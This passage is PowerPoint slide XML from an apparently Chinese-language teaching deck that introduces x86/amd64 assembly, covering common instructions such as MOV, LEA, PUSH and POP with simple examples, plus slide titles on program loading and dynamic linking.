              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="697" idx="3"/>
            <a:endCxn id="711" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763900" y="2468600"/>
            <a:ext cx="770800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="714" name="Shape 714"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="711" idx="2"/>
            <a:endCxn id="712" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312133" y="2660584"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB32ED1E-3C57-4B5E-97AE-4231E2EF61B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="1351466"/>
            <a:ext cx="4064163" cy="57372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zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>动态链接的程序的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="矩形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D424BE05-ACFA-4158-AA0C-C4C925F5083E}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的装载与进程的执行</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161A895-2852-4CA9-A4DE-8C067FC01831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110927" y="2131456"/>
            <a:ext cx="2195167" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MOV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADD/SUB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PUSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7EA0A7-AB29-4680-B29C-251A83AE3EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5915694" y="2131456"/>
            <a:ext cx="3700529" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>J[Condition]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEAVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3C4A32-06B5-4AE4-A53E-0FB0E835CF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4455335" y="1566760"/>
            <a:ext cx="2031325"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常用汇编指令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE051B2-9F31-4490-B210-EBDC06E2317D}"/>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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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30511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17AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1233014"/>
            <a:ext cx="862737" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>MOV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EAE2525-E9BE-4190-AB31-577FE090399F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="1898881"/>
            <a:ext cx="5471498"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MOV DEST, SRC</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把源操作数传送给目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2387738"/>
            <a:ext cx="613244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MOV EAX,1234H 	 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行结果（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">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 1234H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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MOV EBX, EAX </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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MOV EAX, [00404011H]  ; [ ] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表示取地址内的值</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MOV EAX, [ESI]  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9BFB4D-4A8C-4E31-AD23-3BA2EB50B4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116396" y="3820371"/>
            <a:ext cx="862737" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>LEA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A408D3B-C1BB-4C09-8F7D-0A710C940A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547764" y="4486238"/>
            <a:ext cx="7259680"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LEA REG, SRC</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把源操作数的有效地址送给指定的寄存器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BECEDD-CC58-4F43-896E-4CDF1DFEF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547763" y="4975095"/>
            <a:ext cx="8437915"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LEA EBX, ASC                    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址存放至 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄存器中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LEA EAX, 6[ESI]                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ESI+6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单元的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位地址送给 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EAX </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C88363-74F3-42BB-8402-DCBBC1B8ABDB}"/>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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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03206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17AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1665377"/>
            <a:ext cx="1088760" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>PUSH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EAE2525-E9BE-4190-AB31-577FE090399F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2331244"/>
            <a:ext cx="6609502"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PUSH VALUE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把目标值压栈，同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指针</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字长</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2820101"/>
            <a:ext cx="6132448"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PUSH 1234H </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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PUSH EAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1681B94-EB9A-4FB3-8663-6CA3B3DCD2EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="3748043"/>
            <a:ext cx="862737" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>POP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD8F46-DB95-4FD0-BBAE-06FD8169FA53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="4413910"/>
            <a:ext cx="8292655"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POP DEST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将栈顶的值弹出至目的存储位置，同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指针</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字长</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080C8EF2-285D-485B-9AFC-F30F7DC74E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
